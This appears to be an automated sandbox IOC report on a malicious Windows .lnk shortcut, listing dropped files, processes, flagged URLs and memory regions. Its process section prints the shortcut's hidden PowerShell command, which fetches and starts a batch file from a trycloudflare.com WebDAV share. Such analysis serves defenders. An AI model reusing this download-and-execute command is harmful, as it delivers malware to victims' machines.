IOC Report
dial2%20(3).Ink.lnk

loading gif

Files

File Path
Type
Category
Malicious
dial2%20(3).Ink.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mwe5mzu.c5r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eebk5i2h.yvx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iasj4ixj.ayc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iautz3wr.33g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54ee5eacd577877a.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IS5WUGJY89UCG25FP76A.temp
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg' \"$env:USERPROFILE\Downloads\"; Sta
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://pizza-practices-representative-country.trycloudflare.com
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://pizza-practices-representative-country.trycloudflare.com.Z2
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
There are 8 hidden URLs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFB4B1E2000
trusted library allocation
page read and write
27C27BF000
stack
page read and write
7FFB4B384000
trusted library allocation
page read and write
7FFB4B330000
trusted library allocation
page read and write
7FFB4B2D0000
trusted library allocation
page read and write
27C1F4E000
stack
page read and write
7FFB4B220000
trusted library allocation
page read and write
27C1EC6000
stack
page read and write
1E6D0542000
trusted library allocation
page read and write
1E6E6E10000
heap
page read and write
1E6CF00F000
trusted library allocation
page read and write
7FFB4B440000
trusted library allocation
page read and write
1E6CC6B0000
heap
page read and write
1E6D059B000
trusted library allocation
page read and write
1E6CE4F0000
heap
page read and write
7FFB4B320000
trusted library allocation
page read and write
7FFB4B340000
trusted library allocation
page read and write
7DF4BA260000
trusted library allocation
page execute and read and write
1E6E678B000
heap
page read and write
7FFB4B270000
trusted library allocation
page read and write
7FFB4B00D000
trusted library allocation
page execute and read and write
1E6CC5B0000
heap
page read and write
1E6E69EA000
heap
page read and write
27C338E000
stack
page read and write
1E6CE080000
heap
page read and write
7DF4BA270000
trusted library allocation
page execute and read and write
7FFB4B430000
trusted library allocation
page read and write
7FFB4B0BC000
trusted library allocation
page execute and read and write
1E6E6A71000
heap
page read and write
7FFB4B1BA000
trusted library allocation
page read and write
1E6D0280000
trusted library allocation
page read and write
1E6E69A0000
heap
page read and write
7FFB4B389000
trusted library allocation
page read and write
1E6CC53E000
heap
page read and write
7FFB4B240000
trusted library allocation
page read and write
1E6E66E9000
heap
page read and write
1E6DE6C1000
trusted library allocation
page read and write
27C29BB000
stack
page read and write
7FFB4B450000
trusted library allocation
page read and write
27C2637000
stack
page read and write
7FFB4B39C000
trusted library allocation
page read and write
1E6D0624000
trusted library allocation
page read and write
1E6E6A3F000
heap
page read and write
7FFB4B423000
trusted library allocation
page read and write
1E6CC4A0000
heap
page read and write
7FFB4B1A0000
trusted library allocation
page read and write
1E6E6939000
heap
page read and write
1E6E6800000
heap
page read and write
1E6E69D7000
heap
page read and write
1E6E6AE0000
heap
page execute and read and write
7FFB4B2C0000
trusted library allocation
page read and write
7FFB4B480000
trusted library allocation
page read and write
1E6CC514000
heap
page read and write
7FFB4B0E6000
trusted library allocation
page execute and read and write
7FFB4B390000
trusted library allocation
page read and write
1E6CEFDD000
trusted library allocation
page read and write
1E6E67BD000
heap
page read and write
7FFB4B120000
trusted library allocation
page execute and read and write
27C2739000
stack
page read and write
27C1FCE000
stack
page read and write
7FFB4B2A0000
trusted library allocation
page read and write
7FFB4B490000
trusted library allocation
page read and write
27C24FA000
stack
page read and write
1E6CC51F000
heap
page read and write
1E6E6A45000
heap
page read and write
7FFB4B470000
trusted library allocation
page read and write
1E6CC586000
heap
page read and write
7FFB4B01B000
trusted library allocation
page read and write
1E6E6A8E000
heap
page read and write
27C22FE000
stack
page read and write
7FFB4B420000
trusted library allocation
page read and write
1E6D0504000
trusted library allocation
page read and write
1E6E6C70000
trusted library allocation
page read and write
7FFB4B020000
trusted library allocation
page read and write
1E6CF933000
trusted library allocation
page read and write
7FFB4B200000
trusted library allocation
page read and write
1E6CE070000
trusted library allocation
page read and write
1E6CE410000
trusted library allocation
page read and write
7FFB4B260000
trusted library allocation
page read and write
27C283E000
stack
page read and write
1E6CC750000
heap
page read and write
1E6E66C0000
heap
page read and write
1E6CF96B000
trusted library allocation
page read and write
1E6CC55E000
heap
page read and write
1E6CFDBF000
trusted library allocation
page read and write
1E6E69D2000
heap
page read and write
1E6CFA80000
trusted library allocation
page read and write
7FFB4B1C0000
trusted library allocation
page execute and read and write
7FFB4B300000
trusted library allocation
page read and write
7FFB4B1F0000
trusted library allocation
page execute and read and write
1E6CC51A000
heap
page read and write
7FFB4B0B0000
trusted library allocation
page read and write
1E6CC54E000
heap
page read and write
1E6E6777000
heap
page read and write
1E6E6A87000
heap
page read and write
7FFB4B380000
trusted library allocation
page read and write
7FFB4B210000
trusted library allocation
page read and write
7DF4BA280000
trusted library allocation
page execute and read and write
1E6CC517000
heap
page read and write
1E6CE480000
trusted library allocation
page read and write
1E6CF0BD000
trusted library allocation
page read and write
1E6CFAA8000
trusted library allocation
page read and write
1E6CEFC1000
trusted library allocation
page read and write
1E6E6992000
heap
page read and write
1E6CE747000
trusted library allocation
page read and write
27C247E000
stack
page read and write
1E6CE400000
heap
page readonly
1E6E69B0000
heap
page read and write
7FFB4B0C0000
trusted library allocation
page execute and read and write
7FFB4B4B0000
trusted library allocation
page read and write
27C2579000
stack
page read and write
1E6CE490000
heap
page execute and read and write
1E6E693D000
heap
page read and write
1E6CE6B0000
heap
page execute and read and write
1E6DE9B7000
trusted library allocation
page read and write
1E6E6AAB000
heap
page read and write
1E6E674D000
heap
page read and write
1E6DE9A9000
trusted library allocation
page read and write
1E6D02A9000
trusted library allocation
page read and write
7FFB4B4D2000
trusted library allocation
page read and write
7FFB4B1D0000
trusted library allocation
page execute and read and write
1E6CC54A000
heap
page read and write
7FFB4B350000
trusted library allocation
page read and write
1E6CEEF6000
trusted library allocation
page read and write
1E6CC7A0000
heap
page read and write
1E6E6A9F000
heap
page read and write
7FFB4B4E0000
trusted library allocation
page read and write
7FFB4B250000
trusted library allocation
page read and write
27C263E000
stack
page read and write
1E6CF9C7000
trusted library allocation
page read and write
7FFB4B230000
trusted library allocation
page read and write
1E6E6A97000
heap
page read and write
1E6CE3F0000
trusted library allocation
page read and write
7FFB4B2F0000
trusted library allocation
page read and write
1E6E6786000
heap
page read and write
1E6CC542000
heap
page read and write
1E6CEE61000
trusted library allocation
page read and write
1E6CC522000
heap
page read and write
27C293E000
stack
page read and write
7FFB4B002000
trusted library allocation
page read and write
1E6CC6F0000
heap
page read and write
1E6DE9AD000
trusted library allocation
page read and write
7FFB4B280000
trusted library allocation
page read and write
7FFB4B487000
trusted library allocation
page read and write
1E6DE6E1000
trusted library allocation
page read and write
1E6CF8F6000
trusted library allocation
page read and write
27C340E000
stack
page read and write
1E6E6A32000
heap
page read and write
1E6D020B000
trusted library allocation
page read and write
27C23FF000
stack
page read and write
1E6CC58C000
heap
page read and write
1E6DE6F1000
trusted library allocation
page read and write
1E6CEFB4000
trusted library allocation
page read and write
1E6DE730000
trusted library allocation
page read and write
7FFB4B360000
trusted library allocation
page read and write
7FFB4B460000
trusted library allocation
page execute and read and write
27C227D000
stack
page read and write
1E6CC7A5000
heap
page read and write
1E6E692D000
heap
page read and write
1E6CEFCE000
trusted library allocation
page read and write
1E6E6A2A000
heap
page read and write
1E6E68E0000
heap
page read and write
1E6CE440000
trusted library allocation
page read and write
7FFB4B003000
trusted library allocation
page execute and read and write
1E6D0295000
trusted library allocation
page read and write
1E6E6956000
heap
page read and write
1E6CE504000
heap
page read and write
7FFB4B010000
trusted library allocation
page read and write
1E6CEF6C000
trusted library allocation
page read and write
1E6E68FC000
heap
page read and write
1E6D04E5000
trusted library allocation
page read and write
7FFB4B004000
trusted library allocation
page read and write
27C26B8000
stack
page read and write
1E6CE497000
heap
page execute and read and write
1E6CEF1D000
trusted library allocation
page read and write
1E6E6A61000
heap
page read and write
7FFB4B1B1000
trusted library allocation
page read and write
7FFB4B2B0000
trusted library allocation
page read and write
27C237B000
stack
page read and write
1E6CC755000
heap
page read and write
1E6D02EE000
trusted library allocation
page read and write
7FFB4B398000
trusted library allocation
page read and write
7FFB4B4D4000
trusted library allocation
page read and write
1E6CE6C1000
trusted library allocation
page read and write
7FFB4B0B6000
trusted library allocation
page read and write
1E6CF211000
trusted library allocation
page read and write
1E6E6AA1000
heap
page read and write
7FFB4B05C000
trusted library allocation
page execute and read and write
27C28BD000
stack
page read and write
1E6CC4DB000
heap
page read and write
1E6CE8E8000
trusted library allocation
page read and write
27C25BE000
stack
page read and write
1E6CC690000
heap
page read and write
7FFB4B2E0000
trusted library allocation
page read and write
1E6E674A000
heap
page read and write
1E6E67A5000
heap
page read and write
1E6CF036000
trusted library allocation
page read and write
1E6E6AB5000
heap
page read and write
7FFB4B290000
trusted library allocation
page read and write
1E6CEB5D000
trusted library allocation
page read and write
7FFB4B310000
trusted library allocation
page read and write
7FFB4B363000
trusted library allocation
page read and write
There are 192 hidden memdumps, click here to show them.